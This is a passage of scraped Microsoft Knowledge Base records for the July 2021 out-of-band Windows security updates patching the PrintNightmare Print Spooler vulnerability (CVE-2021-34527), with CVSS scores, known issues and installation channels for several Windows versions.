8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004954](<https://download.microsoft.com/download/7/3/c/73cce342-34cc-4e96-9924-e42c5a19efe3/5004954.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004954 (Monthly Rollup) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004954", "href": "https://support.microsoft.com/en-us/help/5004954", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:16", "description": "None\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nWSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive an error, \"Cannot connect to <Server name>, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, we strongly recommend that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5003636](<https://support.microsoft.com/help/5003636>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004959>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004959](<https://download.microsoft.com/download/b/1/7/b172b821-2078-46a7-9d3b-ad57b43bc04a/5004959.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004959 (Security-only update) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004959", "href": "https://support.microsoft.com/en-us/help/5004959", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:08", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**5/11/21 \nREMINDER **Windows 10, version 1809 reached end of service on May 11, 2021 for devices running the Enterprise, Education, and IoT Enterprise editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.We will continue to service the following editions: Enterprise G, HoloLens, and the LTSC editions for Client, Server, and IoT.\n\n**5/11/21 \nREMINDER **Microsoft removed the Microsoft Edge Legacy desktop application that is out of support in April 2021. In the May 11, 2021 release, we installed the new Microsoft Edge. For more information, see [New Microsoft Edge to replace Microsoft Edge Legacy with April\u2019s Windows 10 Update Tuesday release](<https://aka.ms/EdgeLegacyEOS>).\n\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1809 update history [page](<https://support.microsoft.com/en-us/help/4464619>).\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing [KB4493509](<https://support.microsoft.com/en-us/help/4493509>), devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| \n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see [Manage the input and display language settings in Windows 10](<https://support.microsoft.com/en-us/help/4496404>).\n 2. Select **Check for Updates** and install the April 2019 Cumulative Update. For instructions, see Update Windows 10.\n**Note **If reinstalling the language pack does not mitigate the issue, reset your PC as follows:\n\n 1. Go to the **Settings **app > **Recovery**.\n 2. Select **Get Started** under the **Reset this PC **recovery option.\n 3. Select **Keep my Files**.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing KB5001342 or later, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. \nFor more information about the specific errors, cause, and workaround for this issue, please see KB5003571. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **> **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5009616. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the May 11, 2021 servicing stack update (SSU) (KB5003243) or the latest SSU (KB5003711) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/en-us/help/4535697>).If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004947>)website. \nWindows Server Update Services (WSUS)| Yes| You can import this update into WSUS manually. See the [Microsoft Update Catalog](<https://docs.microsoft.com/en-us/windows-server/administration/windows-server-update-services/manage/wsus-and-the-catalog-site#the-microsoft-update-catalog-site>) for instructions. \n**File information **For a list of the files that are provided in this update, download the [file information for cumulative update 5004947](<https://download.microsoft.com/download/5/5/3/553b918f-10d2-4ecb-aa41-3aad1fbfe0c3/5004947.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004947 (OS Build 17763.2029) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004947", "href": "https://support.microsoft.com/en-us/help/5004947", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:16", "description": "None\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5003636](<https://support.microsoft.com/help/5003636>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004958>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004958](<https://download.microsoft.com/download/e/e/8/ee826b51-4cff-4102-9abf-cabaab679169/5004958.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004958 (Security-only update) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004958", "href": "https://support.microsoft.com/en-us/help/5004958", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:08", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**5/11/21** \n**REMINDER **Windows 10, version 1909 reached end of service on May 11, 2021 for devices running the Home, Pro, Pro for Workstation, Nano Container, and Server SAC editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10We will continue to service the following editions: Enterprise, Education, and IoT Enterprise.\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1909 update history home page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. \n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update**Prerequisite:You must install the April 13, 2021 servicing stack update (SSU) (KB5001406) or the latest SSU (KB5003974) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004946>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004946](<https://download.microsoft.com/download/3/8/0/380275c2-0d42-4deb-a865-5059529c83f5/5004946.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004946 (OS Build 18363.1646) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004946", "href": "https://support.microsoft.com/en-us/help/5004946", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:08", "description": "None\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1607 update history home page. \n\n## Highlights\n\nThis security update includes key changes as follows:\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **> **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5010359. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001402) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- 